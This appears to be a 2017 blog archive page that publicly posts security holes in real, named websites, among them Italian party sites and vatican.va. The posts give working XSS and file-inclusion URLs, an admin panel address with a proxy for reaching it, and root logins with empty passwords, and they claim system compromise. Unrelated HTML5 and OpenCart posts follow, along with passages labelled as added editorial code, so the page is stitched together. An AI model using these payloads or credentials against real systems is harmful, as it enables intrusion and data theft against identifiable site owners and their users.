Posts

Showing posts from September, 2017

hacksannio.it (... other websites) | path disclosure, system compromise

Simply requesting the theme URL http://www.hacksannio.it/wp-content/themes/betheme/ raises an error that discloses the server path: Fatal error: Uncaught Error: Call to undefined function get_header() in /web/htdocs/www.hacksannio.it/home/wp-content/themes/betheme/index.php:10 Stack trace: #0 {main} thrown in /web/htdocs/www.hacksannio.it/home/wp-content/themes/betheme/index.php on line 10
_______________
Update: once code execution is obtained, it is possible to escalate to root locally (exploit: openrestinpeace) and to cause a local DoS. There are several other websites on the same server: 9plus.it abgdhs.com academyhoreca.it acquagia.com agropolibooking.it albertogalantini.com alcacomunicazione.it alexandramatveeva.com alkemicaproject.it allianceagainstcancer.org anelli.info angolodeidesideri.it antonelladambrosio.com apicolturavallicupe.com appcreative.it arredostil.it aspveneto.org avvocatovitali.com bbqcombi.com belsiana7central.com beneventocalcio.it bestrav

w2.vatican.va photovat.com | XSS, path disclosure

Simple reflected XSS: http://w2.vatican.va/content/francesco/it/events/event.dir.html/content/vaticanevents/it/2017/4/229%3Cimg%20src=%22a%22%20onerror=%22alert('xss')%22%3E
_____________________________________
Adobe Experience Manager CMS. A proxy is needed to connect, since they have probably restricted access to a range of IPs. Sample working proxy: 5.152.158.4:8080. Admin access: https://w2.vatican.va:4502/admin. SSL verification must be disabled (OCSP in Firefox). Update: it's possible to access
_____________________________________
Other websites: http://player.rv.va/rv.player01.asp?language=it&AudioLanguage=ita&visual=Tv&nocontrols=tr%27ue&fullframe=true&width=640&height=360%22%3E%3Cimg%20src=a%20onerror=alert(%221%22)%3E%3C%22&autoplay=true
_____________________________________
http://www.photovat.com: IIS server, path disclosure D:\inetpub\webs\photovatcom

https://www.movimento5stelle.it | xss, stored xss, session theft, scripts errors, data leak, remote file inclusion, system compromise

https://www.movimento5stelle.it/cgi-bin/mt-4/mt-cp.cgi
File inclusion: dodosmail.php is a bogus contact email script. http://www.movimento5stelle.it/parlamento/segnalazioni.html http://www.movimento5stelle.it/parlamento/dodosmail.php?dodosmail_header_file=[any local file] Example: http://www.movimento5stelle.it/parlamento/dodosmail.php?dodosmail_header_file=eventi.html Archived page showing the inclusion of an HTML page available on the server: http://archive.is/vHgOn Archived source of the Movable Type CGI (a bogus, obsolete version used on the website): http://archive.is/20Uen http://www.movimento5stelle.it/parlamento/dodosmail.php?dodosmail_header_file=../../../cgi-bin/mt-4/mt.cgi The script can be triggered to show errors and the path: Warning: array_keys() expects parameter 1 to be array, null given in /home/httpd/html/casaleggio/beppegrillo.it/beppegrillo/movimento/parlamento/dodosmail.php on line 58
XSS: there are various XSS and stored XSS in the profil
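The dodosmail.php source is not on this page, so the following is an added editorial example, not the site's code: it reconstructs the class of bug behind `?dodosmail_header_file=<file>` (a request parameter used directly as an include path) next to a hardened version that only accepts allowlisted template names resolved inside a fixed directory. The parameter name is taken from the post; the template directory, file names and function names are assumptions. The same pattern also addresses the path disclosures seen across the posts on this page, which come from PHP warnings being rendered to the client.

```php
<?php
// Added example, not the original dodosmail.php: the vulnerable include
// pattern and a hardened replacement. TEMPLATE_DIR, the template names and
// the function names are assumptions made for this illustration.

// --- vulnerable: the request parameter becomes the include path ---
function render_header_vulnerable(array $get): void
{
    $file = $get['dodosmail_header_file'] ?? 'header.html';
    // Any readable file can be pulled in, e.g. eventi.html or
    // ../../../cgi-bin/mt-4/mt.cgi as shown in the post above.
    include $file;
}

// --- hardened: the client picks a key, never a path ---
const TEMPLATE_DIR = __DIR__ . '/templates';                       // assumption
const ALLOWED_TEMPLATES = ['header' => 'header.html', 'eventi' => 'eventi.html'];

function resolve_template(string $key): ?string
{
    // 1. only allowlisted keys are accepted; "../" can never appear in a key
    if (!isset(ALLOWED_TEMPLATES[$key])) {
        return null;
    }
    $base = realpath(TEMPLATE_DIR);
    $path = realpath(TEMPLATE_DIR . '/' . ALLOWED_TEMPLATES[$key]);
    // 2. defence in depth: the resolved file must still lie under TEMPLATE_DIR
    //    (catches symlinks or a misconfigured allowlist entry)
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

function render_header_hardened(array $get): void
{
    $path = resolve_template($get['dodosmail_header_file'] ?? 'header');
    if ($path === null) {
        http_response_code(400);
        echo 'invalid template';
        return;
    }
    include $path; // only an allowlisted file inside TEMPLATE_DIR reaches here
}

// Warnings such as "array_keys() expects parameter 1 to be array" must be
// logged, not shown: shown warnings are what leaked /home/httpd/html/... above.
ini_set('display_errors', '0');
ini_set('log_errors', '1');
```

The key design choice is that the browser never supplies a file name at all, only a lookup key; the `realpath` prefix check is a second layer in case the allowlist itself is ever edited to point outside the directory. `display_errors` belongs in php.ini on a production host rather than in the script, but is shown here because it is the direct cause of the path disclosures reported on this page.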

https://iscriviti.radicali.it | errors, path disclosure, system compromise

Directly accessing https://iscriviti.radicali.it gives an error that reveals the paths: https://iscriviti.radicali.it/Landing/RegistraDati D:\xampp\htdocs\radicali\landing_iscrizione\index.php They are using Windows and XAMPP, which are not the best choice for a production server that stores sensitive data. The PHP scripts use the CodeIgniter framework. The archived error page: http://archive.is/PFw55 Access to phpMyAdmin: https://iscriviti.radicali.it/phpmyadmin/ user: root password: "" FTP: iscriviti.radicali.it user: root password: "" Update: it's not working anymore.

www.leganord.org | various security issues

Vulnerable Phoca Download: it is possible to embed arbitrary YouTube videos via www.leganord.org/index.php/documenti-politici/68-gianfranco-miglio/8741-quella-rivoluzione-dal-basso?videoid=[youtube video id] They also have malware on the site (not from me - a lot of porn content). Google cache: http://webcache.googleusercontent.com/search?q=cache:r0-Y-VR0oHAJ:www.leganord.org/xIpV58pu_+&cd=11&hl=it&ct=clnk&gl=it Copy of the cached page: http://archive.is/7Vhy9 Note: they fixed the problems.

https://margot.partitodemocratico.it - path disclosure, system compromise

There is a path disclosure caused by an error: https://margot.partitodemocratico.it/nl/cancellami.php?e=test&secure=test unsubscribe_v2.php https://margot.partitodemocratico.it/pdnl/nl3/vogliodareunamano.php?id=[anything]&question=[anything]&answer=[anything]&e=[anything]&secure=[anything]&mid=[anything] (original sample: https://margot.partitodemocratico.it/pdnl/nl3/vogliodareunamano.php?id=2&question=2&answer=si&e=ZWxpb3BvbGlAdGlzY2FsaS5pdA&secure=04912b36dcc08f33892266834a963bf0&mid=1eea ) It is possible to gain access to the system. Is it a "honeypot", as stated in the path? Possibly, but they did not fix the bugs and confidential data is accessible. /repository/GCloud-WebRoot/margot.partitodemocratico.it/pd_margot_honeypot/

Content Models html5

Content Models. Metadata: content that sets up the presentation or behavior of the rest of the content. These elements are found in the head of the document. Elements: <base>, <link>, <meta>, <noscript>, <script>, <style>, <title>. Embedded: content that imports other resources into the document. Elements: <audio>, <video>, <canvas>, <iframe>, <img>, <math>, <object>, <svg>. Interactive: content specifically intended for user interaction. Elements: <a>, <audio>, <video>, <button>, <details>, <embed>, <iframe>, <img>, <input>, <label>, <object>, <select>, <textarea>. Heading: defines a section header. Elements: <h1>, <h2>, <h3>, <h4>, <h5>, <h6>, <hgroup>. Phrasing: this model has a number of inline level element

Opencart 2.x - save settings for module or add module to layout

```php
// loading the module-wide settings (stored in the setting table under the module code)
$this->load->model('setting/setting');
$setting = $this->model_setting_setting->getSetting('mymodule');

// saving the module-wide settings: editSetting() takes the module code and the
// submitted data; it keeps only the keys that start with the module code
$this->load->model('setting/setting');
$this->model_setting_setting->editSetting('mymodule', $this->request->post);
```
NOTE: in the form, the input name="" must start with the name of the module. Example: mymodule_limit, mymodule_status, mymodule_othersetting
```php
// getting data for a module instance - usually loaded by the configured layout
$this->load->model('extension/module');
$setting = $this->model_extension_module->getModuleByCode('mymodule');

// saving data for the module with a new id from the POST
// (creates a new instance that can be assigned to a layout)
$this->load->model('extension/module');
if (!isset($this->request->get['module_id'])) {
    // $this->model_extension_m
```
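The two halves above (global settings via `setting/setting`, per-instance settings via `extension/module`) usually live in one admin controller. The following is an added example, not code from the post or from the OpenCart project, showing how they fit together in an OpenCart 2.x admin module controller, including the permission check that must guard every write. The module code `mymodule`, its fields (`mymodule_status`, `mymodule_limit`, `name`) and the template name are assumptions; the class name and `module/mymodule` route follow the 2.0-2.2 convention (2.3 moved modules under `extension/module/`).

```php
<?php
// Added example for OpenCart 2.x, not the page's own code. The module code,
// field names and template path are assumptions; editSetting(), addModule(),
// editModule() and getModule() are the 2.x model methods.
class ControllerModuleMymodule extends Controller {
    private $error = array();

    public function index() {
        $this->load->language('module/mymodule');
        $this->document->setTitle($this->language->get('heading_title'));

        $this->load->model('setting/setting');
        $this->load->model('extension/module');

        // The admin token is enforced by the framework on every admin route;
        // validate() adds the per-route permission check. Writes happen only
        // for a POST that passes it.
        if (($this->request->server['REQUEST_METHOD'] == 'POST') && $this->validate()) {
            // Module-wide settings: only keys prefixed with the module code
            // (mymodule_status, mymodule_limit, ...) are stored.
            $this->model_setting_setting->editSetting('mymodule', $this->request->post);

            // Layout instance: create a new one without module_id, otherwise update.
            if (!isset($this->request->get['module_id'])) {
                $this->model_extension_module->addModule('mymodule', $this->request->post);
            } else {
                $this->model_extension_module->editModule($this->request->get['module_id'], $this->request->post);
            }

            $this->session->data['success'] = $this->language->get('text_success');
            $this->response->redirect($this->url->link('extension/module', 'token=' . $this->session->data['token'], 'SSL'));
        }

        $data['error_warning'] = isset($this->error['warning']) ? $this->error['warning'] : '';

        // Read back the module-wide settings for the form (config is loaded from the setting table).
        $data['mymodule_status'] = $this->config->get('mymodule_status');
        $data['mymodule_limit']  = $this->config->get('mymodule_limit');

        // Read back the instance settings when editing an existing module_id.
        $data['name'] = '';
        if (isset($this->request->get['module_id'])) {
            $module_info = $this->model_extension_module->getModule($this->request->get['module_id']);
            if (isset($module_info['name'])) {
                $data['name'] = $module_info['name'];
            }
            $data['action'] = $this->url->link('module/mymodule', 'token=' . $this->session->data['token'] . '&module_id=' . $this->request->get['module_id'], 'SSL');
        } else {
            $data['action'] = $this->url->link('module/mymodule', 'token=' . $this->session->data['token'], 'SSL');
        }
        $data['token'] = $this->session->data['token'];

        $data['header']      = $this->load->controller('common/header');
        $data['column_left'] = $this->load->controller('common/column_left');
        $data['footer']      = $this->load->controller('common/footer');

        $this->response->setOutput($this->load->view('module/mymodule.tpl', $data));
    }

    protected function validate() {
        // Without this check any authenticated admin user, whatever their
        // user group, could rewrite the module's settings.
        if (!$this->user->hasPermission('modify', 'module/mymodule')) {
            $this->error['warning'] = $this->language->get('error_permission');
        }
        return !$this->error;
    }
}
```

On the catalog side the layout passes the stored instance settings to the module controller as `index($setting)`, so the catalog code never needs to look the instance up itself; the `getModuleByCode()` call from the post is only needed when a module wants its instances outside of a layout.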